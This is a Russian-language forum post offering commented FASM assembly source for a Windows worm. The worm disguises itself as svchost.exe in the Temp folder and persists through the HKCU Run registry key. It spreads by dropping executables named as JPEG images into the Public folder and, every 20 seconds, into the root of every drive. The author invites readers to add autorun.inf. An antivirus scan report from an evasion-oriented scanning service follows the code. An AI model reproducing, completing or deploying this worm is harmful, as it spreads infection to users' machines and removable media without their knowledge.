Червь на ассемблере [FASM]

[IBM]

Всем привет, написал червя. Прокомментировал каждую строчку, что бы было понятнее. Возможно кому-то пригодится. Распространяется путем копирования в папку PUBLIC и копированием каждые 20 секунд в корень каждого диска. Кому надо, тот еще допилит autorun.inf

Код:

include 'win32ax.inc'

section '.data' data readable writeable
i dd 0
j dd 0
AutoKey db 'Software\Microsoft\Windows\CurrentVersion\Run',0
ValueName db 'svchost',0
hkey dd ?
nWinLength dw ?
IpWinPath db MAX_PATH dup(0)
nBufferLength dw ?
IpBuffer db MAX_PATH dup(0)
nTempLength dw ?
IpTempPath db MAX_PATH dup(0)
IpCommand db '/c copy ', 0
new db 0

section '.code' code readable executable
start:
  jmp @exec
  @exec:
  invoke GetModuleFileName, 0, IpBuffer, nBufferLength ; получаем путь до себя
  invoke GetTempPath, nTempLength, IpTempPath                      ; получаем путь до папки temp
  invoke GetWindowsDirectory, IpWinPath, nWinLength               ; получаем путь до папки Windows
  invoke lstrcat, IpTempPath, 'svchost.exe'         ; прибавляем к пути до Temp название svchost.exe
  invoke lstrcmp, IpBuffer, IpTempPath               ; сравниваем путь до себя и получившийся путь
  cmp eax, 0                    ; если они равны, то мы запущены с именем svchost.exe из папки temp и переходим далее, если не равны то делаем следующий код:
  je @exec_two
  invoke DeleteFile, IpTempPath       ; удаляем предыдущий файл
  invoke CopyFile, IpBuffer, IpTempPath, 1 ; копируемся туда с именем svchost.exe
  invoke ShellExecute, 0, 'open', IpTempPath, NULL, NULL, SW_SHOW ; запускаем svchost
  jmp @exit  ; прыгаем на выход и выходим из процесса
  @exec_two:                                              ; тут мы уже запущены от svchost.exe
  invoke RegCreateKeyEx, HKEY_CURRENT_USER,AutoKey,NULL,NULL,NULL,KEY_ALL_ACCESS,NULL,hkey,NULL  ; открываем ключ автозапуска
  invoke lstrlen,IpTempPath                                    ; получаем длину пути до Temp вместе с svchost.exe
  invoke RegSetValueEx,[hkey],ValueName,NULL,REG_SZ,IpTempPath,eax   ; пишем себя в автозапуск
  invoke RegCloseKey,[hkey]     ; закрываем ключ
  mov [j], 48                     ; кладем в переменную j аскии код 48 ( символ 1 )
  @infect_share:                ; входим а цикл
    mov [i], 48               ; в переменную i кладем аскии код 48 ( символ 1 )
    @copy:
      invoke lstrcpy, new, IpCommand     ; копируем переменную IpCommand в переменную new ( в IpCommand лежит /c copy )
      invoke lstrcat, new, IpTempPath  ; добавляем к переменной new путь до Temp вместе с svchost.exe
      invoke lstrcat, new, ' '                 ; добавляем пробел
      invoke lstrcat, new, '%PUBLIC%\Big_boobs.jpg.'          ; добавляем путь до общей папки с названием Big_boobs.jpg.
      invoke lstrcat, new, j                      ; добавляем в Big.boobs.jpg число  ( десяток )
      invoke lstrcat, new, i                ; добавляем к Big.boobs.jpg%число% еще одно число ( единициу, т.е получается типа такого 38 )
      invoke lstrcat, new, '.exe'               ; добавляем .exe
      invoke ShellExecute, 0, 'open', 'cmd.exe', new, IpWinPath, SW_HIDE ; передаем получившеюся команду в командную строку
      add [i], 1    ; повышаем i на 1
    cmp [i], 58   ; сравниваем i с 58
    jnz @copy  ; если не равно, прыгаем на @copy
    add [j], 1    ; прибавляем в j еще 1
  cmp [j], 58  ; если j не равно 58, то прыгаем на @infect_share
  jnz @infect_share                        ; таким образом мы генерируем файлы пронумерованные от 00 до 99
  @usb:        ; метка для бесконечного цикла заражения всех дисков
  mov [i], 65  ; кладем в i аскии код 65 ( символ A )
  @infect_disks:      ; заражение всех дисков
    mov [j], 48       ; кладем в j аскии код 48 ( символ 1 )
    @generate_filenames:      ; генерируем имена и заражем определенный диск
      invoke lstrcpy, new, i   ; копируем в переменную new символ из аскии кода, который в i ( буква от A - Z )
      invoke lstrcat, new, ':\Big_Boobs.jpg.' ; прибавляем путь куда будем создавать
      invoke lstrcat, new, j        ; нумеруем ( от 0 - 9 ) Все то же самое, что и в заражении общей папки
      invoke lstrcat, new, '.exe'   ; добавляем .exe
      invoke CopyFile, IpBuffer, new, 0  ; копируемся
      add [j], 1      ; повышаем j на один
    cmp [j], 58      ; сравниваем j, если он равен 58 ( символ 9 ), то продолжаем
    jnz @generate_filenames    ; иначе прыгаем обратно и создаем еще одну копию с новым номером
    add [i], 1    ; повышаем i на 1
  cmp [i], 91  ; сравнивиаем i с 91 ( символ Z )
  jnz @infect_disks  ; если не равно, то прыгаем в начало и заражаем следующий диск
  push 20000 ; кладем в стек 20000
  invoke Sleep    ; вызываем Sleep ( 20 секунд )
  jmp @usb ; как прошло 20 секунд, прыгаем на самое начало заражения дисков и делаем процедуру заного
  @exit: ; метка выхода из программы
  invoke MessageBox, 0, 'Go and watch porn! Asshole!', 'PORNO', 0  ; перед выходом из процесса показываем сообщение
  invoke ExitProcess, 0           ; выход из процесса
.end start

Компилятор FASM.

Скан:

Название файла: USB.exe
Размер файла: 3584 байт
Дата сканирования: Tue, 10 Dec 13 12:09:43 -0500
MD5-хэш файла: b6433510b42e6ff873d66a6b2c43920c

Результат: 12 из 36

Ad-Aware: OK
AhnLab V3 Internet Security: OK
ArcaVir: OK
Avast: Win32:Small-MOF Trj
AVG: LuaHeur.Win32/DH{A2EPNg}
Avira: TR/ATRAPS.Gen Trojan!
Bitdefender/BullGuard: Trojan.Generic.10073787
BullGuard Internet Security 2013: Trojan.Generic.10073787
Comodo: OK
Dr.Web: Trojan.MulDrop5.4888
Emsisoft Anti-Malware (a-squared Anti-Malware): OK
eScan Internet Security Suite 14: Malware detected
Fortinet 5: OK
F-Prot: OK
F-Secure 2014: OK
G Data: Virus: Trojan.Generic.10073787 (Engine A)

IKARUS: Trojan.Win32.Swisyn
Immunet/ClamAV: OK
K7 Ultimate: OK
Kaspersky Internet Security 2014: HEUR:Trojan.Win32.Generic
McAfee Total Protection 2013: OK
Microsoft Security Essentials: Malware detected
NANO: OK
NOD32: @Trojan.Win32/Agent.VLT
Norman: OK
Norton Internet Security: OK
Outpost Security Suite Pro 8.0: OK
Quick Heal: OK
Sophos: OK
SUPERAntiSpyware: OK
Total Defense Internet Security: OK
Trendmicro Titanium Internet Security: OK
Twister Antivirus 8: OK
VBA: OK
VIPRE Internet Security 2013: OK
Virit: OK

Scan report generated by Scanner.FuckAV.ru